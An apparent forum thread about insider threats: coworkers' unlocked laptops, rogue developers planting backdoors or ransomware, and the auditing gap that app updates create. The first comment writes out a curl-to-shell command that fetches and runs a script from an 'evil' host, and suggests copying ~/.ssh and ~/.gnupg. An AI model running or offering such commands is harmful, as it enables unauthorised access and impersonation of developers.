by hkjgkjy
3447 days ago
Surely many of us have thought about how this is a very doable thing. Many of my coworkers often leave their laptops unlocked, unattended when they head for coffee or otherwise. Nothing stops me from running a quick command, forever allowing me access at any time the machine is on (it's only one `$ curl https://myhost.sh/evil.sh| sh` away. Or just copying their ~/.ssh (and maybe ~/.gnupg)). After having either shell access or copying those files, adding stuff to the code base in their names is trivial. Of course we don't do it, but it surprises me how uncommon it is. Must be human beings are in general not assholes. Strangely, my non-programmer friends are surprised when I explain how one would do that, if they allowed me to run any code on their machine.
|
Even commercial applications can have employees that can embed code that gives them access to the machine that the application is running on; think what a single application like TeamViewer can do on the target computer.
Yet, most people allow all apps to send and receive data from the internet unhinged even though they don't need it.
Then there are also automated updates: you may audit an app once, but as soon as it's updated, it's an entirely different application that needs to be audited again.
I really do believe that we are going to see more of these cases as soon as some developer becomes desperate enough (like someone with mountains of debt and no way out) and starts embedding things like ransomware or other types of blackmail.